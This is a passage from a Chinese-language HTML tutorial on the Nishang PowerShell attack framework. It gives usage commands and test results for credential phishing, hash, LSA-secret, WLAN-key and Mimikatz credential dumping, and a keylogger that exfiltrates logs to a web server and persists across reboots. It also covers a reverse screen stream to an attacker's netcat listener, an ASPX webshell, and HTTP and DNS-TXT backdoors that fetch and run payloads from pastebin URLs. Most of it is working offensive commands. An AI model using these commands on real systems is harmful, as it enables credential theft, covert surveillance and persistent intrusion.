<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/copy-vss.jpg" alt="Copy-VSS"></p>
<h4 id="invoke-credentialsphish">Invoke-CredentialsPhish</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x662F;&#x7528;&#x6765;&#x6B3A;&#x9A97;&#x7528;&#x6237;&#x8F93;&#x5165;&#x8D26;&#x53F7;&#x5BC6;&#x7801;&#x4FE1;&#x606F;&#x7684;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Invoke-CredentialsPhish
</code></pre>
<p>&#x6D4B;&#x8BD5;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/invoke-credentials.jpg" alt="Invoke-CredentialsPhish">
&#x6267;&#x884C;&#x540E;&#x4F1A;&#x5F39;&#x51FA;&#x8FD9;&#x4E2A;&#x6846;&#x6B3A;&#x9A97;&#x7528;&#x6237;&#x8F93;&#x5165;
&#x76F4;&#x5230;&#x7528;&#x6237;&#x8F93;&#x5165;&#x6B63;&#x786E;&#x540E;&#x8FD9;&#x4E2A;&#x6846;&#x624D;&#x4F1A;&#x6D88;&#x5931;&#xFF0C;&#x7136;&#x540E;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x660E;&#x6587;&#x7684;&#x7BA1;&#x7406;&#x5458;&#x8D26;&#x53F7;&#x5BC6;&#x7801;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/invoke-credentials2.jpg" alt="Invoke-CredentialsPhish"></p>
<h4 id="firebuster-firelistener">FireBuster FireListener</h4>
<p>FireBuster&#x53EF;&#x4EE5;&#x5BF9;&#x5185;&#x7F51;&#x8FDB;&#x884C;&#x626B;&#x63CF;&#xFF0C;&#x5B83;&#x4F1A;&#x628A;&#x5305;&#x53D1;&#x7ED9;FireListener
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; FireBuster <span class="hljs-number">10.10</span>.<span class="hljs-number">10.10</span> <span class="hljs-number">1000</span>-<span class="hljs-number">1020</span>
PS &gt; FireListener -portrange <span class="hljs-number">1000</span>-<span class="hljs-number">1020</span>
</code></pre>
<p>&#x8BE5;&#x811A;&#x672C;&#x4F5C;&#x8005;&#x7684;Github&#x4E0A;&#x9762;&#x8FD8;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;Python&#x7248;&#x7684;&#x76D1;&#x542C;&#x7AEF;&#xFF1A;
<a href="https://github.com/roo7break/PowerShell-Scripts/blob/master/FireBuster/" target="_blank">https://github.com/roo7break/PowerShell-Scripts/blob/master/FireBuster/</a>
&#x6D4B;&#x8BD5;
&#x6211;&#x4EEC;&#x9996;&#x5148;&#x5728;&#x6211;&#x4EEC;&#x7684;&#x673A;&#x5668;&#xFF08;Attacker&#xFF09;&#x4E0A;&#x9762;&#x8FD0;&#x884C;FireListener&#xFF1A;</p>
<pre><code class="lang-powershell">FireListener <span class="hljs-number">100</span>-<span class="hljs-number">110</span>
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/FireListener.jpg" alt="FireListener">
Victim&#xFF1A;</p>
<pre><code class="lang-powershell">FireBuster <span class="hljs-number">192.168</span>.<span class="hljs-number">199.1</span> <span class="hljs-number">90</span>-<span class="hljs-number">110</span> -Verbose
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/firebuster.jpg" alt="FireBuster"></p>
<h4 id="get-information">Get-Information</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x5927;&#x91CF;&#x7684;&#x4FE1;&#x606F;&#xFF08;FTP&#x8BBF;&#x95EE;&#xFF0C;&#x8FDB;&#x7A0B;&#xFF0C;&#x8BA1;&#x7B97;&#x673A;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x65E0;&#x7EBF;&#x7F51;&#x7EDC;&#x548C;&#x8BBE;&#x5907;&#x7684;&#x4FE1;&#x606F;&#xFF0C;Hosts&#x4FE1;&#x606F;&#x7B49;&#x7B49;&#x975E;&#x8D85;&#x4E30;&#x5BCC;&#xFF09;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-Information
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/get-info.jpg" alt="get-info">
&#x8FD8;&#x53EF;&#x4EE5;&#x7528;&#x6211;&#x4EEC;&#x524D;&#x9762;&#x8BF4;&#x8FC7;&#x7684;Out-File&#x6765;&#x5C06;&#x8FD0;&#x884C;&#x7ED3;&#x679C;&#x4FDD;&#x5B58;&#x5230;&#x6307;&#x5B9A;&#x6587;&#x4EF6;&#x3002;</p>
<h4 id="get-lsasecret">Get-LSASecret</h4>
<p>&#x8BE5;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;LSA&#x4FE1;&#x606F;&#xFF0C;&#x4F46;&#x662F;&#x4F7F;&#x7528;&#x7684;&#x524D;&#x63D0;&#x5F53;&#x7136;&#x662F;&#x4F60;&#x5DF2;&#x7ECF;&#x6210;&#x529F;&#x63D0;&#x5347;&#x4E86;&#x6743;&#x9650;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x901A;&#x5E38;&#x548C;&#x6211;&#x4EEC;&#x540E;&#x9762;&#x63D0;&#x6743;&#x5F53;&#x4E2D;&#x6D89;&#x53CA;&#x5230;&#x7684;Enable-DuplicateToken&#xFF08;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x83B7;&#x5F97;System&#x6743;&#x9650;&#xFF09;&#x8054;&#x5408;&#x4F7F;&#x7528;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Enable-DuplicateToken
PS &gt; Get-LsaSecret
PS &gt; Get-LsaSecret -RegistryKey KeyName //&#x8FD8;&#x53EF;&#x4EE5;&#x6307;&#x5B9A;&#x952E;&#x540D;
</code></pre>
<h4 id="get-passhashes">Get-PassHashes</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x5728;Administrator&#x7684;&#x6743;&#x9650;&#x4E0B;&#xFF0C;&#x53EF;&#x4EE5;dump&#x51FA;&#x5BC6;&#x7801;&#x54C8;&#x5E0C;&#x503C;&#x3002;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6765;&#x81EA;&#x4E8E;msf&#x4E2D;powerdump&#xFF0C;&#x4F46;&#x505A;&#x51FA;&#x4E86;&#x4FEE;&#x6539;&#xFF0C;&#x4F7F;&#x5F97;&#x6211;&#x4EEC;&#x4E0D;&#x518D;&#x9700;&#x8981;System&#x6743;&#x9650;&#x5C31;&#x53EF;&#x4EE5;dump&#x4E86;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-PassHashes -PSObjectFormat //&#x53EF;&#x4EE5;&#x4F7F;&#x7528;-PSObjectFormat&#x6765;&#x683C;&#x5F0F;&#x5316;&#x8F93;&#x51FA;&#x7ED3;&#x679C;
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/get-passhashes.jpg" alt="Get-PassHashes"></p>
<h4 id="get-wlan-keys">Get-WLAN-Keys</h4>
<p>&#x5728;Administrator&#x7684;&#x6743;&#x9650;&#x4E0B;&#xFF0C;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6765;dump&#x51FA;WLAN&#x6587;&#x4EF6;&#x7684;&#x5BC6;&#x94A5;&#x4FE1;&#x606F;&#x3002;&#x5B9E;&#x8D28;&#x4E0A;&#xFF0C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x5C31;&#x662F;&#x5229;&#x7528;&#x4E86;netsh wlan show profile name=&quot;&quot; key=clear&#x6765;&#x83B7;&#x53D6;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-WLAN-Keys
</code></pre>
<h4 id="keylogger">Keylogger</h4>
<p>Keylogger&#x53EF;&#x4EE5;&#x4FDD;&#x5B58;&#x4E0B;&#x7528;&#x6237;&#x7684;&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis  //-CheckURL&#x53C2;&#x6570;&#x4F1A;&#x53BB;&#x68C0;&#x67E5;&#x6240;&#x7ED9;&#x51FA;&#x7684;&#x7F51;&#x9875;&#x4E4B;&#x4E2D;&#x662F;&#x5426;&#x5305;&#x542B; -MagicString&#x540E;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#x7684;&#x8BDD;&#x5C31;&#x505C;&#x6B62;&#x4F7F;&#x7528;&#x8BB0;&#x5F55;&#x3002;
PS &gt; .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.226</span>/<span class="hljs-keyword">data</span>/catch.php //&#x5C06;&#x8BB0;&#x5F55;&#x6307;&#x5B9A;&#x53D1;&#x9001;&#x7ED9;&#x4E00;&#x4E2A;&#x53EF;&#x4EE5;&#x8BB0;&#x5F55;Post&#x8BF7;&#x6C42;&#x7684;Web&#x670D;&#x52A1;&#x5668;
PS &gt; .\Keylogger.ps1 -persist //&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#x8BB0;&#x5F55;&#xFF08;&#x91CD;&#x542F;&#x540E;&#x4F9D;&#x7136;&#x8FDB;&#x884C;&#x8BB0;&#x5F55;&#xFF09;
PS &gt; .\Keylogger.ps1 //&#x76F4;&#x63A5;&#x4EE5;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x6765;&#x8FD0;&#x884C;&#xFF0C;&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x4F1A;&#x4FDD;&#x5B58;&#x5728;&#x5F53;&#x524D;&#x7528;&#x6237;&#x7684;Temp&#x76EE;&#x5F55;&#x4E0B;key&#x6587;&#x4EF6;&#x4E2D;
</code></pre>
<p>&#x6D4B;&#x8BD5;
&#x9996;&#x5148;&#x6267;&#x884C; PS &gt; .\Keylogger.ps1 
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/keylogger.jpg" alt="keylogger">
&#x53D1;&#x73B0;&#x5728;&#x5F53;&#x524D;&#x7528;&#x6237;&#x7684;Temp&#x76EE;&#x5F55;&#x4E0B;&#x751F;&#x6210;&#x4E86;Key&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x8FD9;&#x65F6;&#x6211;&#x4EEC;&#x4F7F;&#x7528;nishang Utility&#x4E2D;&#x7684;Parse_Keys&#x6765;&#x89E3;&#x6790;</p>
<pre><code class="lang-powershell">PS &gt;Parse_Keys .\key.log .\parsed.txt
</code></pre>
<p>&#x7136;&#x540E;parsed.txt&#x91CC;&#x9762;&#x5C31;&#x662F;&#x89E3;&#x6790;&#x540E;&#x7684;&#x6309;&#x952E;&#x8BB0;&#x5F55;&#x4E86;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/parsed.jpg" alt="Parsed"></p>
<h4 id="invoke-mimikatzwdigestdowngrade">Invoke-MimikatzWdigestDowngrade</h4>
<p>Dump&#x51FA;Windows 8.1 and Server 2012&#x7684;&#x7CFB;&#x7EDF;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt;Invoke-MimikatzWDigestDowngrade
PS &gt; Get-Job | Receive-Job
</code></pre>
<p>&#x6267;&#x884C;&#x4E86;</p>
<pre><code class="lang-powershell">PS &gt;Invoke-MimikatzWDigestDowngrade
</code></pre>
<p>Windows&#x4F1A;&#x9501;&#x5C4F;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/invoke-down.jpg" alt="lock">
&#x4E4B;&#x540E;&#x6267;&#x884C;</p>
<pre><code class="lang-powershell">Get-Job
</code></pre>
<p>&#x53D1;&#x73B0;&#x5C1D;&#x8BD5;&#x591A;&#x6B21;&#x90FD;&#x6D4B;&#x8BD5;&#x5931;&#x8D25;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/get-job.jpg" alt="Get-Job">
&#x89E3;&#x51B3;&#x529E;&#x6CD5;&#x53EF;&#x4EE5;&#x53C2;&#x8003;&#xFF1A;
<a href="http://www.myhack58.com/Article/html/3/62/2016/75903.htm" target="_blank">&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Dump Clear-Text Password after KB2871997 installed</a></p>
<h4 id="get-passhints">Get-PassHints</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x4ECE;Windows&#x83B7;&#x5F97;&#x7528;&#x6237;&#x7684;&#x5BC6;&#x7801;&#x7684;&#x63D0;&#x793A;&#x4FE1;&#x606F;&#xFF0C;&#x9700;&#x8981;&#x6709;Administrator&#x7684;&#x6743;&#x9650;&#x6765;&#x8BFB;&#x53D6;SAM hive&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-PassHints
</code></pre>
<h4 id="show-targetscreen">Show-TargetScreen</h4>
<p>&#x4F7F;&#x7528;MJPEG&#x4F20;&#x8F93;&#x76EE;&#x6807;&#x673A;&#x5668;&#x7684;&#x8FDC;&#x7A0B;&#x684C;&#x9762;&#x7684;&#x5B9E;&#x65F6;&#x753B;&#x9762;&#xFF0C;&#x5728;&#x672C;&#x673A;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;NC&#x6216;&#x8005;Powercat&#x6765;&#x8FDB;&#x884C;&#x76D1;&#x542C;&#x3002;&#x5728;&#x672C;&#x5730;&#x4F7F;&#x7528;&#x652F;&#x6301;MJPEG&#x7684;&#x6D4F;&#x89C8;&#x5668;&#xFF08;&#x5982;&#xFF1A;Firefox&#xFF09;&#x8BBF;&#x95EE;&#x672C;&#x673A;&#x5BF9;&#x5E94;&#x76D1;&#x542C;&#x7AEF;&#x53E3;&#xFF0C;&#x5373;&#x53EF;&#x5728;&#x6D4F;&#x89C8;&#x5668;&#x4E0A;&#x9762;&#x770B;&#x5230;&#x8FDC;&#x7AEF;&#x4F20;&#x8F93;&#x56DE;&#x6765;&#x7684;&#x5B9E;&#x65F6;&#x753B;&#x9762;&#x3002;</p>
<pre><code class="lang-powershell">PS &gt; Show-TargetScreen -Reverse -IPAddress <span class="hljs-number">192.168</span>.<span class="hljs-number">230.1</span> -Port <span class="hljs-number">443</span>  //&#x5C06;&#x8FDC;&#x7A0B;&#x7684;&#x753B;&#x9762;&#x4F20;&#x9001;&#x5230;<span class="hljs-number">192.168</span>.<span class="hljs-number">230.1</span>&#x7684;<span class="hljs-number">443</span>&#x7AEF;&#x53E3;
</code></pre>
<p>&#x6D4B;&#x8BD5;
Victim&#xFF1A;</p>
<pre><code class="lang-powershell">Show-TargetScreen -IPAddres <span class="hljs-number">192.168</span>.<span class="hljs-number">199.127</span> -Port <span class="hljs-number">5773</span> -Reverse
</code></pre>
<p>Attacker&#xFF1A;</p>
<pre><code class="lang-powershell">nc.exe -nlvp <span class="hljs-number">5773</span> | nc.exe -nlvp <span class="hljs-number">9000</span> //&#x8FD9;&#x91CC;&#x6211;&#x4F7F;&#x7528;&#x7684;NC&#xFF0C;&#x4E5F;&#x53EF;&#x4EE5;&#x7528;Powercat
</code></pre>
<p>&#x672C;&#x673A;&#x8BBF;&#x95EE;&#xFF1A;127.0.0.1:9000
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/show-targetscreen.jpg" alt="show-targetscreen"></p>
<h4 id="invoke-mimikatz">Invoke-Mimikatz</h4>
<p>Mimikatz&#x5927;&#x5BB6;&#x90FD;&#x975E;&#x5E38;&#x719F;&#x6089;&#x4E86;&#xFF0C;&#x5C31;&#x4E0D;&#x518D;&#x4ECB;&#x7ECD;&#x4E86;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">Invoke-Mimikatz -DumpCerts //Dump&#x51FA;&#x672C;&#x673A;&#x7684;&#x51ED;&#x8BC1;&#x4FE1;&#x606F;
Invoke-Mimikatz -DumpCreds -ComputerName @(<span class="hljs-string">&quot;computer1&quot;</span>, <span class="hljs-string">&quot;computer2&quot;</span>) //Dump&#x51FA;&#x8FDC;&#x7A0B;&#x4E24;&#x53F0;&#x8BA1;&#x7B97;&#x673A;&#x7684;&#x51ED;&#x8BC1;&#x4FE1;&#x606F;
Invoke-Mimikatz -Command <span class="hljs-string">&quot;privilege::debug exit&quot;</span> -ComputerName <span class="hljs-string">&quot;computer1&quot;</span> //&#x5728;&#x8FDC;&#x7A0B;&#x4E00;&#x53F0;&#x673A;&#x5668;&#x4E0A;&#x8FD0;&#x884C;Mimikatz&#x5E76;&#x6267;&#x884C;<span class="hljs-string">&quot;privilege::debug exit&quot;</span>
</code></pre>
<h3 id="1&#x57DF;&#x76F8;&#x5173;&#x811A;&#x672C;">1.&#x57DF;&#x76F8;&#x5173;&#x811A;&#x672C;</h3>
<h4 id="get-unconstrained">Get-Unconstrained</h4>
<p>&#x67E5;&#x627E;&#x57DF;&#x5185;&#x5F00;&#x542F;&#x4E86;Kerberos Unconstrained Delegation&#x7684;&#x673A;&#x5668;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Get-Unconstrained //&#x8FD4;&#x56DE;&#x5F00;&#x542F;&#x7684;&#x8BA1;&#x7B97;&#x673A;&#x540D;
PS &gt; Get-Unconstrained -Details  //&#x8FD4;&#x56DE;&#x66F4;&#x8BE6;&#x7EC6;&#x7684;&#x4FE1;&#x606F;
</code></pre>
<p>&#x5173;&#x4E8E;&quot;&#x901A;&#x8FC7;Kerberos Unconstrained Delegation&#x83B7;&#x53D6;&#x5230;&#x57DF;&#x7BA1;&#x7406;&#x5458;&quot;&#xFF1A;
<a href="http://www.freebuf.com/articles/terminal/98530.html" target="_blank">http://www.freebuf.com/articles/terminal/98530.html</a></p>
<h3 id="2antak-webshell">2.Antak Webshell</h3>
<h4 id="antak">Antak</h4>
<p>&#x4E00;&#x4E2A;ASPX&#x7684;Webshell&#xFF0C;&#x901A;&#x8FC7;&#x8FD9;&#x4E2A;Webshell&#x53EF;&#x4EE5;&#x7F16;&#x7801;&#x3001;&#x6267;&#x884C;&#x811A;&#x672C;&#xFF0C;&#x4E0A;&#x4F20;&#x3001;&#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#x3002;
![Antak_UI][7]
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">&#x4E0A;&#x4F20;Webshell&#x540E;&#x628A;&#x5B83;&#x5F53;&#x6210;&#x4E00;&#x4E2A;&#x6B63;&#x5E38;&#x7684;Powershell&#x6267;&#x884C;&#x7A97;&#x53E3;&#x6765;&#x4F7F;&#x7528;
&#x4E0A;&#x4F20;&#x548C;&#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#xFF0C;&#x53EA;&#x9700;&#x8981;&#x586B;&#x5199;&#x597D;&#x5BF9;&#x5E94;&#x8DEF;&#x5F84;&#x70B9;&#x51FB;&#x4E0A;&#x4F20;&#x3001;&#x4E0B;&#x8F7D;&#x6309;&#x94AE;&#x5373;&#x53EF;
</code></pre>
<p>&#x5173;&#x4E8E;Antak Webshell&#x7684;&#x66F4;&#x591A;&#x4ECB;&#x7ECD;&#xFF0C;&#x8BF7;&#x53C2;&#x8003;&#xFF1A;
<a href="http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" target="_blank">http://www.labofapenetrationtester.com/2014/06/introducing-antak.html</a></p>
<h3 id="3&#x540E;&#x95E8;">3.&#x540E;&#x95E8;</h3>
<h4 id="http-backdoor">HTTP-Backdoor</h4>
<p>HTTP-Backdoor&#x53EF;&#x4EE5;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x5728;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x4E0B;&#x8F7D;&#x548C;&#x6267;&#x884C;Powershell&#x811A;&#x672C;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis
</code></pre>
<p>&#x4E0B;&#x9762;&#x89E3;&#x91CA;&#x4E0B;&#x51E0;&#x4E2A;&#x6BD4;&#x8F83;&#x91CD;&#x8981;&#x7684;&#x53C2;&#x6570;&#xFF1A;</p>
<ul>
<li>CheckURL &#x7ED9;&#x51FA;&#x4E00;&#x4E2A;URL&#x5730;&#x5740;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#x6211;&#x4EEC;MagicString&#x4E2D;&#x7684;&#x503C;&#x5C31;&#x53BB;&#x6267;&#x884C;Payload - &#x4E0B;&#x8F7D;&#x8FD0;&#x884C;&#x6211;&#x4EEC;&#x7684;&#x811A;&#x672C;</li>
<li>PayloadURL &#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x7ED9;&#x51FA;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x4E0B;&#x8F7D;&#x7684;Powershell&#x811A;&#x672C;&#x7684;&#x5730;&#x5740;</li>
<li>Arguments &#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x8981;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;</li>
<li>StopString &#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x4E5F;&#x4F1A;&#x53BB;&#x770B;&#x662F;&#x5426;&#x5B58;&#x5728;&#x6211;&#x4EEC;CheckURL&#x8FD4;&#x56DE;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#x5C31;&#x4F1A;&#x505C;&#x6B62;&#x6267;&#x884C;<h4 id="dnstxtpwnage">DNS_TXT_Pwnage</h4>
&#x5229;&#x7528;DNS&#x96A7;&#x9053;&#x6765;&#x8FDB;&#x884C;&#x4FE1;&#x606F;&#x4F20;&#x8F93;&#x3001;&#x901A;&#x4FE1;&#x7684;&#x5C0F;&#x6280;&#x5DE7;&#x5DF2;&#x7ECF;&#x4E0D;&#x5C11;&#x89C1;&#x4E86;&#x3002;&#x5728;Nishang&#x4E2D;&#x4E5F;&#x96C6;&#x6210;&#x4E86;&#x4E00;&#x4E2A;&#x901A;&#x8FC7;DNS TXT&#x6765;&#x63A5;&#x6536;&#x547D;&#x4EE4;&#x6216;&#x8005;&#x811A;&#x672C;&#x7684;&#x540E;&#x95E8;&#x811A;&#x672C;&#x3002;&#x4F7F;&#x7528;DNS_TXT_Pwnage&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#xFF0C;&#x6211;&#x4EEC;&#x4E00;&#x822C;&#x9700;&#x8981;&#x914D;&#x5408;Utility&#x4E0B;&#x7684;Out-DnsTxt&#x4F7F;&#x7528;&#x3002;
&#x6240;&#x4EE5;&#x8FD9;&#x91CC;&#x9996;&#x5148;&#x8BF4;&#x4E0B;Out-DnsTxt&#x7684;&#x4F7F;&#x7528;&#xFF1A;</li>
</ul>
<pre><code class="lang-powershell">PS &gt;Out-DnsTxt -DataToEncode path //path&#x5904;&#x662F;&#x4F60;&#x60F3;&#x7F16;&#x7801;&#x7684;&#x5185;&#x5BB9;&#x7684;&#x8DEF;&#x5F84;
</code></pre>
<p>&#x4E4B;&#x540E;&#xFF0C;&#x5B83;&#x4F1A;&#x751F;&#x6210;&#x4E00;&#x4E2A;&#x7F16;&#x7801;&#x540E;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/out-dns.jpg" alt="out-dnstxt">
&#x7136;&#x540E;&#x6211;&#x4EEC;&#x53BB;&#x6DFB;&#x52A0;&#x5BF9;&#x5E94;&#x7684;TXT&#x8BB0;&#x5F55;&#x5C31;&#x884C;&#x4E86;&#xFF0C;encoded.txt&#x6587;&#x4EF6;&#x4E2D;&#x6BCF;&#x4E00;&#x884C;&#x4E3A;&#x4E00;&#x6761;&#x8BB0;&#x5F55;
&#x6DFB;&#x52A0;&#x5B8C;&#x540E;&#x6211;&#x4EEC;&#x8FD8;&#x9700;&#x8981;&#x6DFB;&#x52A0;&#x4E24;&#x6761;TXT&#x8BB0;&#x5F55;&#xFF0C;&#x5185;&#x5BB9;&#x4E3A;start&#x548C;stop
&#x6DFB;&#x52A0;&#x5B8C;&#x6210;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5229;&#x7528;DNS_TXT_Pwnage&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x4E86;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt;DNS_TXT_Pwnage -startdomain start.test.com -cmdstring start -commanddomain command.test.com -psstring test -psdomain xxx.test.com -Subdomains <span class="hljs-number">1</span> -StopString stop
</code></pre>
<p>&#x5177;&#x4F53;&#x53C2;&#x6570;&#x7684;&#x610F;&#x601D;&#xFF1A;</p>
<ul>
<li>startdomain &#x4F1A;&#x4E00;&#x76F4;&#x53BB;&#x68C0;&#x6D4B;&#x6211;&#x4EEC;&#x6307;&#x5B9A;&#x57DF;&#x540D;&#x7684;TXT&#x8BB0;&#x5F55;&#xFF0C;&#x5E76;&#x628A;&#x8FD4;&#x56DE;&#x7684;&#x8BB0;&#x5F55;&#x4E0E;&#x6211;&#x4EEC;&#x8F93;&#x5165;&#x7684;cmdstring&#x4EE5;&#x53CA;psstring&#x8FDB;&#x884C;&#x6BD4;&#x8F83;</li>
<li>cmdstring &#x662F;&#x6211;&#x4EEC;&#x4EFB;&#x610F;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;startdomain&#x4E0E;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x8F93;&#x5165;&#x7684;cmdstring&#x503C;&#x76F8;&#x7B49;&#x5219;&#x6267;&#x884C;commanddomain&#x547D;&#x4EE4;</li>
<li>commanddomain &#x521B;&#x5EFA;&#x7684;&#x6267;&#x884C;&#x547D;&#x4EE4;TXT&#x8BB0;&#x5F55;&#x7684;&#x57DF;&#x540D;</li>
<li>psstring &#x662F;&#x6211;&#x4EEC;&#x4EFB;&#x610F;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x4E0E;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x8F93;&#x5165;&#x7684;psstring&#x503C;&#x76F8;&#x7B49;&#x5219;&#x6267;&#x884C;psdomain&#x811A;&#x672C;</li>
<li>psdomain &#x662F;&#x6211;&#x4EEC;&#x521B;&#x5EFA;&#x7684;&#x6267;&#x884C;&#x811A;&#x672C;TXT&#x8BB0;&#x5F55;&#x7684;&#x57DF;&#x540D;</li>
<li>Subdomains &#x662F;&#x6267;&#x884C;&#x811A;&#x672C;&#x521B;&#x5EFA;TXT&#x8BB0;&#x5F55;&#x7684;&#x4E2A;&#x6570;</li>
<li>StopString &#x662F;&#x4EFB;&#x610F;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x8FD9;&#x91CC;&#x8F93;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x4E0E;startdomain&#x4E2D;&#x8FD4;&#x56DE;&#x7684;&#x8BB0;&#x5F55;&#x76F8;&#x540C;&#x5C06;&#x4F1A;&#x505C;&#x6B62;&#x6267;&#x884C;&#x6211;&#x4EEC;&#x7684;Payload</li>
<li>Arguments &#x6307;&#x5B9A;&#x8981;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;&#x540D;<h4 id="execute-ontime">Execute-OnTime</h4>
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</li>
</ul>
<pre><code class="lang-powershell">PS &gt; Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload
</code></pre>
<p>&#x5177;&#x4F53;&#x53C2;&#x6570;&#x7684;&#x610F;&#x601D;&#xFF1A;</p>
<ul>
<li>PayloadURL &#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x811A;&#x672C;&#x4E0B;&#x8F7D;&#x7684;&#x5730;&#x5740;</li>
<li>Arguments &#x6307;&#x5B9A;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;&#x540D;</li>
